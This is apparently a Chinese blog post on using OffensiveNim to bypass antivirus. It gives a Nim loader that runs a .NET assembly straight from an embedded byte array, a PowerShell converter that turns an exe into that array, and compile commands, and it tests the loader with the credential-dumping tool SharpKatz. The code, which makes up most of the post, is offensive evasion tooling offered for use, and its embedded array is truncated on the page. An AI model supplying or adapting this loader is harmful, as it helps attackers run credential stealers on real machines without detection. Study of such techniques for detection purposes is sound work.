Nim套娃加載.NET程序集
VSole2021-08-28 23:22:14
簡介
使用OffensiveNim繞過常見殺軟。
Start the game
主要用到的庫是 winim（winim/clr 模塊）。
import winim/clr
import sugar
import strformat
# Embedded .NET assembly, kept as a byte array and handed to load() below
# rather than read from a path. The first two bytes (0x4d 0x5a) are the "MZ"
# PE header. The array is declared with 4608 elements but only four are listed
# here: the literal is truncated on the page and will not compile as shown.
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]

# Enumerate the CLR runtimes installed on the host (winim/clr helper).
echo "[*] Installed .NET versions"
for v in clrVersions():
  echo fmt" \--- {v}"
echo ""
echo ""

# Load the managed assembly straight from the in-memory buffer and print its
# metadata via winim/clr's dump.
# NOTE(review): a native (non-.NET) host process that loads the CLR and then
# runs an assembly with no backing image on disk is a useful hunting signal
# for defenders; the page does not show which telemetry the author evaluated.
var assembly = load(buf)
dump assembly

# Invoke the entry point twice: first with a single empty string, then with a
# real string argument. The arguments are wrapped twice - a VT_BSTR array of
# strings, then an outer one-element variant array - presumably to match a
# `static void Main(string[] args)` signature (not shown on this page).
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
作者提供了一個 PowerShell 腳本，將 exe 轉為符合 Nim 語法的 byte 數組。
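function CSharpToNimByteArray
{
    <#
    .SYNOPSIS
    Converts a binary file (or every file directly inside a folder) into a Nim
    byte-array literal of the form
        var buf: array[N, byte] = [byte 0x4D,0x5A,...]

    .PARAMETER inputfile
    Path of the file to convert, or of a folder when -folder is given.

    .PARAMETER folder
    Treat -inputfile as a directory and convert each file directly inside it
    (subfolders are not recursed).

    .OUTPUTS
    None. For each input <path> a text file <path>NimByteArray.txt is written
    next to it; progress is reported with Write-Host. Empty files are skipped
    with a warning because they would yield "[byte 0x]", which is not valid Nim.
    #>
    Param
    (
        [string]
        $inputfile,
        [switch]
        $folder
    )

    # Convert one file and write the literal next to it. Both branches below
    # share this so the formatting rules live in a single place. Returns the
    # output path, or nothing when the file was skipped.
    function Write-NimByteArray([string] $path)
    {
        Write-Host "Converting $path"
        $outfile = $path + "NimByteArray.txt"
        # ReadAllBytes works on both Windows PowerShell and PowerShell 6+
        # (Get-Content -Encoding Byte was removed in 6.0) and reads the file in
        # one call instead of emitting one object per byte. Resolving through
        # the provider keeps relative paths relative to the PowerShell
        # location rather than the process working directory.
        $resolved = (Resolve-Path -LiteralPath $path).ProviderPath
        [byte[]] $hex = [System.IO.File]::ReadAllBytes($resolved)
        if ($hex.Length -eq 0)
        {
            Write-Warning "Skipping empty file $path"
            return
        }
        # "4D,0x5A,..." - the join supplies the 0x for every element but the
        # first, which the prefix below provides.
        $hexString = ($hex | ForEach-Object ToString X2) -join ',0x'
        $Results = "var buf: array[" + $hex.Length + ", byte] = [byte 0x" + $hexString + "]"
        $Results | Out-File -FilePath $outfile
        return $outfile
    }

    if ($folder)
    {
        $Files = Get-ChildItem -Path $inputfile -File
        foreach ($file in $Files.FullName)
        {
            # Discard the returned path; the folder summary is printed once below.
            Write-NimByteArray $file | Out-Null
        }
        Write-Host -ForegroundColor yellow "Results Written to the same folder"
    }
    else
    {
        $outfile = Write-NimByteArray $inputfile
        if ($outfile)
        {
            Write-Host "Result Written to $outfile"
        }
    }
}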
測試SharpKatz

體積有點大。
編譯
# Cross-compile execute_assembly.nim as a 64-bit console binary
# (-d=mingw selects the MinGW cross toolchain, --cpu=amd64 the target).
nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim
Bingo

體積只有800k。

目前還無法傳入自定義參數，修改源碼後如下：
import winim/clr
import sugar
import strformat
import os
# Embedded .NET assembly bytes (0x4d 0x5a = "MZ" PE header), handed to load()
# below. Declared as array[4608, byte] but only four elements are listed here:
# the literal is truncated on the page and does not compile as shown.
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]

# Enumerate the installed CLR runtimes (winim/clr helper).
echo "[*] Installed .NET versions"
for v in clrVersions():
  echo fmt" \--- {v}"
echo ""
echo ""

# Load the assembly from the in-memory buffer and print its metadata.
# NOTE(review): a native host process loading the CLR and executing an
# assembly with no backing image on disk is a reasonable hunting signal for
# defenders; nothing on this page shows which telemetry was evaluated.
var assembly = load(buf)
dump assembly

# Collect every command-line argument, paramStr(1) .. paramStr(paramCount()),
# so it can be forwarded to the assembly. With no arguments `cmd` stays empty;
# the earlier version of this script passed [""] in that case and the page
# does not show how Invoke behaves with an empty sequence.
var cmd: seq[string]
var i = 1
while i <= paramCount():
  cmd.add(paramStr(i))
  inc(i)
echo cmd

# Wrap the arguments as a VT_BSTR array, then as a one-element outer variant
# array (presumably the string[] parameter of Main, not shown here) and
# invoke the entry point.
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
